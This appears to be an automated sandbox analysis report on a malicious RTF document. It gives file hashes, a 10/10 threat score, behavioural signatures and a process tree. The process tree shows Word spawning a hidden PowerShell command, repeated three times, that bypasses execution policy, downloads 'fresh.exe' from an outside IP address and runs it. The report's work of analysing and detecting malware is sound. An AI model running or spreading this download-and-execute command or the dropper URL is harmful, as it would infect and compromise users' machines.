Analysis
-
max time kernel
148s -
max time network
197s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
30-07-2021 15:26
General
-
Target
57bb59a2c491b89b3321428121ba1b5e88daca5a8e379fde41afc73e9679d752.rtf
-
Size
662KB
-
MD5
47a5e618c809f1f37bccced9d3536deb
-
SHA1
da3a6f5851537edffcc29e9bf4282d552090ce6e
-
SHA256
57bb59a2c491b89b3321428121ba1b5e88daca5a8e379fde41afc73e9679d752
-
SHA512
0d4f429f517b2d2045ef32e3a8e3f86b9a250e7f666398d88409a9a56e2a155baef2decf3c167941cd7da28b503241a6f9553d3ca06094bb965781097cb7a18c
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
httP://136.144.41.61/fresh.exe
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 3 IoCs
-
Drops file in Windows directory 1 IoCs
-
Office loads VBA resources, possible macro or embedded object present
-
Modifies Internet Explorer settings 1 TTPs 9 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of SetWindowsHookEx 4 IoCs
-
Suspicious use of WriteProcessMemory 16 IoCs
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\57bb59a2c491b89b3321428121ba1b5e88daca5a8e379fde41afc73e9679d752.rtf"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://136.144.41.61/fresh.exe','C:\Users\Admin\AppData\Roaming\fresh.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\fresh.exe'"2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://136.144.41.61/fresh.exe','C:\Users\Admin\AppData\Roaming\fresh.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\fresh.exe'"2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://136.144.41.61/fresh.exe','C:\Users\Admin\AppData\Roaming\fresh.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\fresh.exe'"2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
12.3MB
-
Filesize
4KB
-
Filesize
12.3MB
-
Filesize
8KB
-
Filesize
64KB
-
Filesize
8KB
-
Filesize
12KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB